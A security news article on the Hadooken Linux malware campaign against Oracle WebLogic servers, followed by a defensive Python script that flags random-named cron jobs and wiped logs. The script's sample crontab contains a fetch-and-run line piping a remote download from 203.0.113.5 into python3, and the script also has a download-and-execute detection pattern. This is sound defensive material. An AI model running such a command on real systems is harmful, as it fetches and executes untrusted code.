A new Linux malware campaign targeting Oracle WebLogic servers has been identified; it turns compromised hosts into cryptocurrency miners and stages them for distributed denial-of-service (DDoS) attacks. Dubbed "Hadooken," the malware was discovered by Aqua Security researchers. It gains its foothold through weak credentials or unpatched Oracle WebLogic installations, a product widely used in enterprise environments to host business-critical Java applications.
Once in, the attacker drops two loader payloads, a shell script and a Python script, each of which fetches the Hadooken binary from a remote server (two loaders in different interpreters give the attacker a fallback if one is missing or blocked). Hadooken then carries out the malicious work: it deploys a cryptominer and distributes the Tsunami botnet malware. Tsunami has a history of targeting services such as Oracle WebLogic and Jenkins, often where they are deployed in Kubernetes clusters. It is particularly dangerous because it combines resource theft (cryptomining) with the ability to launch DDoS attacks from the infected host.
For persistence, the malware creates cron jobs with random names and random execution frequencies, so the scheduled runs of the cryptominer do not stand out from legitimate system activity. It also wipes system logs to make detection and forensic analysis harder. Both traits are themselves detectable: randomly named cron entries that run from staging directories, and log files that are suddenly empty, are signals worth hunting for.
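The two post-exploitation traits described above, randomly named cron jobs and wiped logs, can be hunted for with a small triage script. The following is an added example, not code from Aqua Security, BleepingComputer or the malware itself; the crontab lines, the IP address and the log-size listing are constructed sample data, and the "random name" test is a heuristic (mixed letters and digits with high character entropy), not a signature of Hadooken.

```python
"""Triage helper for cron-based persistence and log wiping.

Added example (not Aqua Security's or BleepingComputer's code). The crontab
text and log sizes below are constructed samples; replace them with real
crontab dumps and live_log_sizes() on a host under investigation.
"""
import math
import os
import re
from collections import Counter

STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Download-and-execute shapes that loader scripts commonly use.
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b.*\|\s*(sh|bash|python3?)\b|base64\s+(-d|--decode)")
# Five schedule fields (or @reboot-style macro) followed by the command.
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.*\S)\s*$")
# Logs an intruder clears; several of these at 0 bytes is not normal rotation.
WATCHED_LOGS = ("/var/log/auth.log", "/var/log/secure", "/var/log/wtmp",
                "/var/log/btmp", "/var/log/lastlog", "/var/log/syslog",
                "/var/log/messages")


def shannon_entropy(s: str) -> float:
    """Bits per character: generated names score ~3, English-like names ~2-2.5."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_random(name: str) -> bool:
    """Heuristic for generated job/file names (assumption, not a Hadooken signature)."""
    return (len(name) >= 6
            and re.fullmatch(r"[A-Za-z0-9_.-]+", name) is not None
            and any(ch.isdigit() for ch in name)
            and any(ch.isalpha() for ch in name)
            and shannon_entropy(name) >= 2.8)


def score_cron_entry(line: str) -> list[str]:
    """Return the indicators that fire for one crontab line (empty = nothing odd)."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return []  # comment or VAR=value line
    m = CRON_LINE.match(line)
    if not m:
        return []
    cmd = m.group(2)
    hits = []
    if any(d in cmd for d in STAGING_DIRS):
        hits.append("runs from staging dir")
    if DOWNLOAD_EXEC.search(cmd):
        hits.append("download-and-execute")
    # Check every path component of every path-like token for generated names.
    for tok in cmd.split():
        if "/" in tok:
            odd = [p for p in tok.split("/") if looks_random(p)]
            if odd:
                hits.append(f"random-looking name {odd[0]}")
                break
    return hits


def scan_crontab(text: str) -> dict[str, list[str]]:
    """Map each suspicious crontab line to the indicators it triggered."""
    out = {}
    for line in text.splitlines():
        hits = score_cron_entry(line)
        if hits:
            out[line.strip()] = hits
    return out


def log_wipe_indicators(sizes: dict[str, int]) -> list[str]:
    """Watched logs present in the listing but 0 bytes long, sorted by path."""
    return sorted(p for p, s in sizes.items() if p in WATCHED_LOGS and s == 0)


def live_log_sizes() -> dict[str, int]:
    """Sizes of the watched logs on this host (needs read access to /var/log)."""
    return {p: os.path.getsize(p) for p in WATCHED_LOGS if os.path.exists(p)}


# Constructed sample input: one benign job, one staged binary, one fetch-and-run loader.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
0 3 * * * /usr/local/bin/backup.sh --full
*/7 * * * * /tmp/.x7k2q9pz/c 2>/dev/null
*/13 * * * * (curl -s http://203.0.113.5/y.py || wget -qO- http://203.0.113.5/y.py) | python3
"""
# Constructed sample listing: syslog still growing, auth/login records emptied.
SAMPLE_LOG_SIZES = {"/var/log/syslog": 48213, "/var/log/auth.log": 0,
                    "/var/log/wtmp": 0, "/var/log/lastlog": 0}

if __name__ == "__main__":
    for entry, hits in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"SUSPECT {hits}: {entry}")
    print("empty watched logs:", log_wipe_indicators(SAMPLE_LOG_SIZES))
```

On a real host, feed `scan_crontab` the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/*` (system files carry an extra user field after the schedule, which the path checks still handle), and pass `live_log_sizes()` to `log_wipe_indicators`. Empty `wtmp`/`lastlog` alongside a healthy `syslog` is a stronger signal than any single empty file, since rotation normally leaves small but non-empty files.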
This attack highlights the importance of keeping WebLogic patched, using strong unique credentials for its administration console, and restricting who can reach that console, since Hadooken relies on exactly these known weaknesses rather than on anything novel. The infrastructure behind the attack is linked to Aeza International LTD, a known bulletproof hosting provider tied to previous cryptomining and ransomware campaigns.
For more details, see the original reporting from Aqua Security and BleepingComputer (https://www.bleepingcomputer.com/news/security/new-linux-malware-hadooken-targets-oracle-weblogic-servers/).